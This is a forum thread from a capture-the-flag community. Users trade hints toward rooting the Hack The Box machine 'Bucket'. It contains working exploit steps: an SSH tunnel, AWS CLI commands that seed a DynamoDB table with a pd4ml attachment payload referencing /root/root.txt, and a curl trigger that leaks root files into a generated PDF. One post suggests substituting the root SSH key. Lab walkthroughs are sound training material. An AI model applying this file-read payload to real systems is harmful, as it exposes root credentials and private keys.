TUTORIAL Bucket Discussion
by Ro0ted - October 17, 2020 at 10:37 PM
#49
can anyone give a nudge to get user ?
#50
I am a little confused here. I see the index.php and it does have the reference to:
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");

We cannot edit this file because it is own by root. I have tried using burp to post what is above and modifying this to copy the /etc/passwd file as I know I would have access to it, but couldn't access anything. 

So I am a little lost here.....
#51
(October 18, 2020 at 09:13 PM)raidmail2020 Wrote:
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...

I can't find this stuff though how its shows alerts stuffs ?
#52
Can someone help me with the root part? I don't get POST-Request work on Port 8000. Or is there another way?
#53
for the last part—if the table and item are not there, create them!
#54
(October 19, 2020 at 06:44 PM)dipshit Wrote: for the last part—if the table and item are not there, create them!

I can't get it to work and am unsure if I am setting the table up correctly. I am doing this via the local dynamo instance over at http://s3.bucket.htb/shell/

I create the alerts table with a string field title. I then put item with title Ransomware and give it a data property of the /root/root.txt. I tunnel and then post to curl -X POST -d '{}' http://127.0.0.1:8000/?action=get_alerts and I don't see any pdf in /var/www/bucket-app/files


`
var params = {
    TableName: 'alerts',
    KeySchema: [
        { // Required HASH type attribute
            AttributeName: 'title',
            KeyType: 'HASH',
        }
    ],
    AttributeDefinitions: [
        {
            AttributeName: 'title',
            AttributeType: 'S', // (S | N | B) for string, number, binary
        },
    ],
    ProvisionedThroughput: {
        ReadCapacityUnits: 1,
        WriteCapacityUnits: 1,
    },
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response

});

var params = {
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});



var params = {
    TableName: 'alerts',
    Item: {
        "title": "Ransomware",
        "data": "/root/root.txt"
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});
`

Where am I going wrong? :/
#55
(October 19, 2020 at 10:07 PM)Kali76 Wrote:
(October 19, 2020 at 07:13 PM)southerndarkness Wrote:
(October 19, 2020 at 06:44 PM)dipshit Wrote: for the last part—if the table and item are not there, create them!

I can't get it to work and am unsure if I am setting the table up correctly. I am doing this via the local dynamo instance over at http://s3.bucket.htb/shell/

I create the alerts table with a string field title. I then put item with title Ransomware and give it a data property of the /root/root.txt. I tunnel and then post to curl -X POST -d '{}' http://127.0.0.1:8000/?action=get_alerts and I don't see any pdf in /var/www/bucket-app/files


`
var params = {
    TableName: 'alerts',
    KeySchema: [
        { // Required HASH type attribute
            AttributeName: 'title',
            KeyType: 'HASH',
        }
    ],
    AttributeDefinitions: [
        {
            AttributeName: 'title',
            AttributeType: 'S', // (S | N | B) for string, number, binary
        },
    ],
    ProvisionedThroughput: {
        ReadCapacityUnits: 1,
        WriteCapacityUnits: 1,
    },
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response

});

var params = {
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});



var params = {
    TableName: 'alerts',
    Item: {
        "title": "Ransomware",
        "data": "/root/root.txt"
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});
`

Where am I going wrong? :/


This script where put him?
-—-———————————-
var params = {
    TableName: 'alerts',
    KeySchema: [
        { // Required HASH type attribute
            AttributeName: 'title',
            KeyType: 'HASH',
        }
    ],
    AttributeDefinitions: [
        {
            AttributeName: 'title',
            AttributeType: 'S', // (S | N | B) for string, number, binary
        },
    ],
    ProvisionedThroughput: {
        ReadCapacityUnits: 1,
        WriteCapacityUnits: 1,
    },
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response

});

var params = {
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

var params = {
    TableName: 'alerts',
    Item: {
        "title": "Ransomware",
        "data": "/root/root.txt"
    },
};
docClient.put(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

——————————-

I'm putting that in the local dynamo shell to create the alerts table with item titled Ransomware. I'm trying to trigger the conditional in /var/www/bucket-app/index.php which generates result.pdf by posting to /?actions=get_alerts
#56
Go to http://s3.bucket.htb/shell/ and put the js there. It creates the alerts table.
#57
Instead of futzing about with the js here are the aws cli commands I run:


# create the table with title field
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htb


# insert an item with Ransomware as title with path of flag
aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "/root/root.txt"}}' \
    --endpoint-url=http://s3.bucket.htb


I then curl after setting up a tunnel:
ssh -L 8000:127.0.0.1:8000 [email protected]
curl -X POST -d '{}' http://127.0.0.1:8000/?action=get_alerts -vvvv

But I don't see any pdf generated in /var/www/bucket-app/files 

:(
#58
It shows up for a few seconds then disappears. If you get a 200 back with a bit of a delay it means it worked. But you will just get a pdf back with the string '/root/root.txt' inside. It doesn't actually read root.txt.
#59
(October 20, 2020 at 03:01 AM)jmax Wrote: It shows up for a few seconds then disappears. If you get a 200 back with a bit of a delay it means it worked. But you will just get a pdf back with the string '/root/root.txt' inside. It doesn't actually read root.txt.

Yeah the data field for the ransomware titled item of the alert table isn't correct. I saw file:///root/root.txt before but it still was unable to put contents of the file in the pdf. The html has the actual string as I. The path and the pdf doesn't have a  proper attachment. Hmmmmm.
#60
finally rooted.
tunnel:
ssh -L 8000:127.0.0.1:8000 [email protected]


create table:
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url=http://s3.bucket.htb


create item:
aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htb


trigger pd4ml generation:
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

cat /var/www/bucket-app/files/result.pdf

The flag will be in there. You can substitute out file:///root/root.txt for ssh key in the data string

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB BountyHunter [Discussion] pheonix2021 47 9,675 Yesterday at 10:11 PM
Last Post: jeopardise myself
TUTORIAL HTB Intelligence [Discussion] pheonix2021 94 23,871 Yesterday at 04:41 PM
Last Post: rushabh1435
TUTORIAL HTB Seal [Discussion] pheonix2021 29 11,453 Yesterday at 12:44 PM
Last Post: C09YC47

 Users browsing this thread: 1 Guest(s)